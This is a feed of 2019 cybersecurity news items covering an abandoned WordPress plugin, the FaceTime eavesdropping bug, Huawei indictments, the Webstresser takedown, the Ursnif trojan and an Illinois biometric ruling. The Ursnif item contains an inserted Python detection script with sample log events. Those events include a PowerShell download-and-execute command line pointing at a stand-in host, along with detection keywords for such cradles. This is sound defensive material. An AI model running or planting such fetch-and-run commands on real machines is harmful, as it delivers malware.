In this particular case, it doesn’t appear as though a patch is possible, given that the developers can’t be reached, according to Wordfence. “There currently do not appear to be any legitimate means of acquiring the latest version of Total Donations. The plugin’s homepage currently displays a Coming Soon page, featuring a mockup image of a new website. The upload path of this image implies the site has been in this state since May 2018."

While some plugin marketplaces continue to offer Total Donations for purchase, Envato Market lists the plugin as no longer available.

A large open developer community presents different pros and cons, and the ability for developers to abandon products is a huge problem with tools like WordPress and others, Gupta said. Developers can create lots of useful plugins to solve specific problems, “but if there isn’t a commitment to long-term support, many of these tools become liabilities. Any time you change a plugin it can cause unintended disruption and problems. Many businesses end up staying with unsupported tools until they actually break to avoid these headaches."

Categories: Cyber Risk News

Group FaceTime Disabled While Apple Works on Fix

Tue, 01/29/2019 - 16:37

A flaw in Apple’s FaceTime app allows users to spy on each other, which has resulted in a storm of tweets encouraging iPhone users to disable FaceTime while Apple works on a fix.

Infosecurity contacted Apple, but the company has not responded with comment. According to Apple’s system status page, FaceTime is experiencing an ongoing issue, which one Twitter user demonstrated in a live video. The vulnerability reportedly affects devices running iOS 12.1 or later, and the status page lists the issue as having begun on January 28, 2019, at 10:16 pm. As a result, the group FaceTime feature is temporarily unavailable.

Additionally, given the widespread popularity of Apple’s iPhone, New York’s governor, Andrew Cuomo, has issued a consumer alert warning the public that the vulnerability allows other users to receive audio from the device being called, even before the call is answered. 

"The FaceTime bug is an egregious breach of privacy that puts New Yorkers at risk," Governor Cuomo said in the alert. "In New York, we take consumer rights very seriously and I am deeply concerned by this irresponsible bug that can be exploited for unscrupulous purposes. In light of this bug, I advise New Yorkers to disable their FaceTime app until a fix is made available, and I urge Apple to release the fix without delay."

To disable FaceTime, open Settings, scroll down to FaceTime and tap the toggle to switch the app off (the toggle will no longer be green).

“This bug illustrates the privacy issues caused by surrounding ourselves with devices containing cameras and microphones. Phones, tablets, laptops, smart TVs, and smart speakers contain microphones that can be listening to you at any point,” said Amit Sethi, senior principal consultant at Synopsys.

“If the software on the devices is not malicious and doesn’t contain bugs like this, the microphones should only be on at times you expect. While security controls like permissions and app store reviews are in place, these are not perfect. The problem is that users don’t know when these devices are listening, as most modern devices don’t have an indicator like an LED that turns on whenever the camera and/or microphone is on.

"This is simply the price we pay for the convenience and features that these Internet-connected devices provide. If you need to be 100% certain that you aren’t being recorded, don’t have any Internet-connected devices with microphones or cameras around.”

Categories: Cyber Risk News

UK Government Pledges Security Skills and R&D Funding

Tue, 01/29/2019 - 11:04

The UK government has pledged more money to address the IT security skills crisis and improve hardware and IoT security, although details on the latter are vague.

An announcement made on Data Protection Day yesterday claimed the UK plans to be a world leader in “designing out” cyber-threats, by funding R&D into more secure-by-design hardware and chips.

The £70m investment will be made through the Industrial Strategy Challenge Fund and backed by further investment from industry, although there were no further details.

An additional £30m will be made available for the Ensuring the Security of Digital Technology at the Periphery program, to improve IoT security.

“We want the UK to be a safer place to live and work online. We’re moving the burden away from consumers to manufacturers, so strong cybersecurity is built into the design of products,” said digital minister, Margot James.

“This funding will help us work with industry to do just that, improving the strength and resilience of hardware to better protect consumers from cyber-attacks.”

The announcement was greeted with skepticism in some quarters.

“The announcement that the UK will become a leader in cybersecurity resulting from a small investment in research is highly unlikely as hardware and research alone is not going to solve cybersecurity threats,” argued Joseph Carson, chief security scientist at Thycotic.

“The solution to reducing cybersecurity threats is a balance between both technology and people. If we are really going to reduce the threats then it needs to start with an investment in education along with a strong investment in technology that is simple, easy to use and does not require a highly skilled workforce to use it.”

The government also pledged £500,000 as part of the next round of the Cyber Skills Immediate Impact Fund.

The money is designed to help improve diversity and reduce skills shortfalls in the information security sector.

Projects set to receive the funding include Crucial Academy, which aims to retrain veterans, focusing on women, neurodiverse and BAME individuals. Also on the list are the QA: Cyber Software Academy for Women and BluescreenIT’s HACKED program, which helps to train candidates with special needs, from disadvantaged backgrounds, and those classed as neurodiverse.

Sarah Armstrong-Smith, head of continuity and resilience at Fujitsu UK, welcomed the pledge for more funding.

“With cyber-criminals becoming more creative and savvy in their approach to cyber-attacks, a cybersecurity team which lacks diversity is more likely to leave a company vulnerable to attacks,” she argued.

“Different groups of people bring a variety of ideas and ways of thinking, which means that a more diverse and inclusive cybersecurity team will be key in facilitating a broader range of ideas and perspectives about how to prevent an attack from taking place.”

Categories: Cyber Risk News

US Turns Up Heat on Huawei with 23-Count Indictments

Tue, 01/29/2019 - 10:33

The US Department of Justice has unsealed charges against Huawei and its CFO covering separate alleged conspiracies to break sanctions on Iran and to steal trade secrets from T-Mobile USA.

The charges were widely expected, but will do nothing to warm relations between the world’s superpowers at a time of growing tension over trade and cyber-espionage.

The first, 13-count indictment charges Huawei, affiliates Huawei Device USA and Skycom, and CFO Meng Wanzhou, also the daughter of founder Ren Zhengfei.

She is charged with bank fraud, wire fraud, and conspiracies to commit bank and wire fraud, while Huawei and Skycom are charged with: bank fraud and conspiracy to commit bank fraud, wire fraud and conspiracy to commit wire fraud, violations of the International Emergency Economic Powers Act (IEEPA) and conspiracy to violate IEEPA, and conspiracy to commit money laundering.

Prosecutors allege that the company had been lying about its relationship with a company in Iran (Skycom) since 2007, claiming that it was not a Huawei affiliate. It’s also alleged that as part of this deception, Meng made a presentation to an executive of one of Huawei’s major banking partners repeatedly making the false claims.

It’s alleged that one bank cleared over $100m worth of Skycom-related transactions through the US between 2010 and 2014.

The lies are said to have extended to Huawei providing false information to Congress on its activities in Iran and obstructing justice last year by moving witnesses with knowledge of the affair back to China, as well as “concealing and destroying” evidence.

The second, 10-count indictment charges Huawei with a conspiracy to steal trade secrets, attempted theft of trade secrets, seven counts of wire fraud, and one count of obstruction of justice.

It relates to an attempt to steal IP from then-partner T-Mobile related to its phone-testing robot “Tappy.” Engineers are said to have violated non-disclosure agreements by taking photos of the equipment and in one case stealing a piece of the device during a tour of the T-Mobile lab.

When T-Mobile threatened to sue, Huawei is said to have produced a report falsely claiming the theft was the work of “rogue actors” inside the company.

However, the indictment alleges that this was actually a long-running, company-wide effort that began in 2012. Prosecutors claim to have an internal company announcement that the firm offered bonuses to employees able to steal info from other companies, to be submitted via an encrypted email address.

A federal jury has already sided with T-Mobile in a 2017 civil case.

The rhetoric in the statements provided by the US side reflects the geopolitical nature of the cases.

“These charges lay bare Huawei’s alleged blatant disregard for the laws of our country and standard global business practices,” said FBI director Christopher Wray. “Companies like Huawei pose a dual threat to both our economic and national security, and the magnitude of these charges make clear just how seriously the FBI takes this threat.”

Huawei has denied the allegations.

Categories: Cyber Risk News

Global Police Crack Down on Webstresser Customers

Tue, 01/29/2019 - 10:02

Europol has detailed how law enforcers across the globe are tracking down customers of notorious DDoS-as-a-service site webstresser.org.

The site was taken down in April 2018 as part of Operation Power OFF, but that gave police a trove of information on its 151,000 registered users. It’s claimed the marketplace helped customers launch over four million attacks for as little as €15 a month.

Countries taking action against DDoS are: Belgium, Croatia, Denmark, Estonia, France, Germany, Greece, Hungary, Ireland, Lithuania, Portugal, Romania, Slovenia, Sweden, Australia, Colombia, Serbia, Switzerland, Norway and the US.

The UK’s National Crime Agency is leading the way, having seized 60 devices in raids and readying action against 250 users of the site, Europol claimed.

In the Netherlands, the authorities are taking a more progressive approach, offering first-time offenders the opportunity to take part in a "Hack_Right" project to prevent them getting into more serious crime.

Elsewhere, the FBI last December disrupted other DDoS-for-hire sites including Downthem and Quantum Stresser, whilst Romanian police have identified the administrators of two smaller DDoS sites, seizing evidence including info on their customers.

Darren Anstee, CTO for security at Netscout, argued that it’s all too easy for malcontents to launch DDoS attacks via stressor and booter services like webstresser, and welcomed the concerted police action.

“This is exactly the kind of action that is needed, as it will dissuade others from simply ‘clicking the button’ to launch an attack — with no consideration of the consequence of that attack,” he added. 

“It should be noted however that this will only dissuade some from using these kinds of services; criminal behavior will persist, and DDoS attacks will continue. Every organization needs to take responsibility for ensuring the availability of their online services is adequately protected.”

Businesses should invest in the right people, process and technology to mitigate the DDoS threat, he added.

Categories: Cyber Risk News

Fileless Infection Steals Creds with Bank Trojan

Mon, 01/28/2019 - 18:01

A new variant of the password-stealing Ursnif bank Trojan has been found in the wild delivering fileless infections while remaining undetected, according to Cisco Talos Intelligence.

In a blog post, researchers wrote that the banking Trojan employs "fileless persistence which makes it difficult for traditional anti-virus techniques to filter out the C2 traffic from normal traffic. Additionally, Ursnif uses CAB files to compress its data prior to exfiltration, which makes this malware even more challenging to stop.”

Researchers received an alert containing a malicious VBA macro coming from a Microsoft Word document that asked users to enable macros. Once enabled, PowerShell is executed and then another PowerShell command downloads the Ursnif malware.

Registry data is then created for the next stage of execution, in which the command executes PowerShell using the Windows Management Instrumentation Command-line (WMIC). Among the APIs imported from kernel32 were GetCurrentProcess, VirtualAllocEx, GetCurrentThreadId, QueueUserAPC, OpenThread and SleepEx, according to the blog.

Though researchers identified a list of files dropped, they also noted, “Filenames are hardcoded in the first PowerShell command executed, and vary by sample. This means that these indicators aren't necessarily malicious on their own as filenames might collide with benign ones. If found with other indicators, it's likely an Ursnif infection.”
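The infection chain described above (Word macro launching PowerShell, a download stage, PowerShell re-launched through WMIC, files dropped under sample-specific names) and the caveat that a dropped filename is only meaningful alongside other indicators can both be expressed as a small scoring rule set. The block below is an added example, not Cisco Talos code and not the article's: it parses constructed process-creation and file-creation events in a flat key=value form (a stand-in for Sysmon or EDR telemetry), applies one rule per link in the chain, and only alerts on a host once the combined weight clears a threshold, so a watch-listed filename on its own never fires. The event format, the hostnames, the encoded command, the URL, the `WATCHLIST_FILENAMES` placeholders and the weights are all constructed for this example; the real filenames vary by sample and come from the Talos IoC list.

```python
"""Score endpoint events for the macro -> PowerShell -> WMIC chain (added example)."""
import re
from collections import defaultdict
from typing import Dict

# Constructed events. WS01 shows the chain from the write-up, WS02 only
# creates a watch-listed filename, WS03 runs an ordinary PowerShell script.
SAMPLE_LOG = r"""
host=WS01 event=ProcessCreate parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
host=WS01 event=ProcessCreate parent="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" image="C:\Windows\System32\wbem\WMIC.exe" cmdline="wmic process call create powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(http://example.invalid/i)"
host=WS01 event=FileCreate image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" target="C:\Users\alice\AppData\Local\Temp\report.cab"
host=WS02 event=FileCreate image="C:\Windows\System32\svchost.exe" target="C:\Users\bob\AppData\Local\Temp\report.cab"
host=WS03 event=ProcessCreate parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -File C:\scripts\backup.ps1"
"""

KV_RE = re.compile(r'(\w+)="([^"]*)"|(\w+)=(\S+)')
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Placeholders standing in for the sample-specific dropped filenames
# (constructed; the real names vary by sample).
WATCHLIST_FILENAMES = {"report.cab", "stage2.tmp"}
# A single strong rule (2) or a filename match alone (1) stays below this.
ALERT_THRESHOLD = 3


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value line; quoted values may contain spaces."""
    ev = {}
    for m in KV_RE.finditer(line):
        if m.group(1):
            ev[m.group(1)] = m.group(2)
        else:
            ev[m.group(3)] = m.group(4)
    return ev


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_powershell(ev) -> bool:
    # The macro stage: an Office process is the parent of powershell.exe.
    return (ev.get("event") == "ProcessCreate"
            and basename(ev.get("parent", "")) in OFFICE_APPS
            and basename(ev.get("image", "")) == "powershell.exe")


def wmic_process_create(ev) -> bool:
    # The next-stage launcher: wmic.exe asked to create a process.
    return (ev.get("event") == "ProcessCreate"
            and basename(ev.get("image", "")) == "wmic.exe"
            and "process call create" in ev.get("cmdline", "").lower())


def powershell_encoded_or_download(ev) -> bool:
    # Encoded command lines or in-memory download helpers on powershell.exe.
    cl = ev.get("cmdline", "").lower()
    return (ev.get("event") == "ProcessCreate"
            and basename(ev.get("image", "")) == "powershell.exe"
            and any(k in cl for k in ("-enc", "-encodedcommand",
                                      "downloadstring", "net.webclient")))


def watchlist_filename(ev) -> bool:
    # Weak on its own: benign files can share these names.
    return (ev.get("event") == "FileCreate"
            and basename(ev.get("target", "")) in WATCHLIST_FILENAMES)


RULES = [
    ("office_spawns_powershell", office_spawns_powershell, 2),
    ("wmic_process_call_create", wmic_process_create, 2),
    ("powershell_encoded_or_download", powershell_encoded_or_download, 2),
    ("watchlist_filename", watchlist_filename, 1),
]


def analyze(log_text: str) -> Dict[str, dict]:
    """Return per-host score, matched rule names and alert decision."""
    per_host = defaultdict(dict)          # host -> {rule_name: weight}
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        for name, fn, weight in RULES:
            if fn(ev):
                # Each rule counts once per host, however often it matches.
                per_host[ev.get("host", "?")][name] = weight
    return {
        host: {
            "score": sum(hits.values()),
            "rules": sorted(hits),
            "alert": sum(hits.values()) >= ALERT_THRESHOLD,
        }
        for host, hits in per_host.items()
    }


if __name__ == "__main__":
    for host, result in analyze(SAMPLE_LOG).items():
        print(host, result)
```

WS01 matches all four rules and alerts; WS02 only touches a watch-listed filename and stays below the threshold, which is exactly the distinction the researchers' note asks for; WS03 produces no hits at all. In production the same structure runs over a time window per host rather than a whole file, so unrelated events days apart do not add up.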

An extensive list of malicious documents and C2 server domains was also included among the indicators of compromise.

"This is just the latest example of how antivirus and signature-based security tools are easily bypassed by creative hackers. There are hundreds of sophisticated hacker tools readily available that can be morphed into endless numbers of new-looking attacks with new signatures that aren’t recognized,” said Ray DeMeo, co-founder and COO, Virsec.

“We need to assume these threats will continue to get through and focus on stopping what the attackers are trying to achieve – corrupting applications, stealing valuable data or causing business disruption. We need to move beyond endless threat chasing to definitively protect the crown jewels – critical applications and infrastructure."

Categories: Cyber Risk News

Illinois Supreme Court Upholds Consumer Privacy Rights

Mon, 01/28/2019 - 17:02

In a landmark ruling in the Rosenbach v. Six Flags Entertainment Corp. case, the Illinois Supreme Court on January 25, 2019, held that consumers can sue for violations of their privacy under the state’s biometric privacy law, a decision that will likely have broad impact and open the door for consumers to file more lawsuits, according to Justin Kay, a partner at Drinker Biddle & Reath.

The case concerned a 14-year-old boy who visited a Six Flags park on a school field trip. Before receiving his season pass and gaining access to the park, the boy was asked to scan his thumb into a biometric data capture system. In her complaint, the mother of the boy said neither she nor her son were informed of the purpose and length of term for which his fingerprint had been collected. Because neither of them had signed a release for the taking of the biometric information, the suit claimed that Six Flags was in violation of the state of Illinois’ Biometric Information Privacy Act.

“The issue for the court to decide in Rosenbach was whether the Illinois Biometric Information Privacy Act would be a 'gotcha' statute, based on the failure of businesses to use magic words when using technology that incorporates biometrics,” said Kay. “With their ruling today, it is.”

The court concluded, “We hold that the questions of law certified by the circuit court must be answered in the affirmative. Contrary to the appellate court’s view, an individual need not allege some actual injury or adverse effect, beyond violation of his or her rights under the Act, in order to qualify as an 'aggrieved' person and be entitled to seek liquidated damages and injunctive relief pursuant to the Act. The judgment of the appellate court is therefore reversed, and the cause is remanded to the circuit court for further proceedings.”

As a result of the ruling, Kay predicts there will be a push for an amendment to the statute. “Efforts were made several years ago to amend the statute after the first spate of lawsuits against tech companies like Facebook related to facial recognition software, but those efforts failed. Last February, bills were again introduced in both the Illinois House and Senate to rein in the scope of the Illinois law, but they did not advance.

“Just as the Illinois statute served as a model for many of those proposals and was cited by legislators, the Supreme Court’s interpretation here is likely to have an impact on how those laws are drafted.”

Categories: Cyber Risk News
